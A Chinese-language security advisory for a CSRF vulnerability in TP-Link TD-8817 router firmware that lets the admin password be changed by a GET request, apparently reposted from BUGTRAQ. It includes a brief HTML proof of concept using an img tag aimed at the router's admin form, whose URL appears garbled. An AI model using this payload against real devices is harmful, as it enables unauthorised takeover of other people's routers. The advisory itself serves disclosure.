发布日期:2013-04-06
更新日期:2013-04-09
受影响系统:
TP-LINK TD-8817 6.0.1 Build 111128 Rel.26763
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58921
TP-Link TD-8817是ADSL2+以太网/USB解调器路由器。
TP-Link TD-8817的默认用户(admin)密码可以在tcp/ip端口80上通过默认路由器页面更改。$_GET即可以更改密码,而无需$_POST请求方法。攻击者可利用此漏洞执行某些管理员操作并非法访问受影响设备。
<*来源:Un0wn_X
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<!-- TP-Link TD-8817 CSRF Explpoit -->
<body>
<img src=https://www.linuxidc.com/"http:/192.168.1.1/Forms/tools_admin_1"/>
</body>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
TP-LINK
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
?model=TD-8817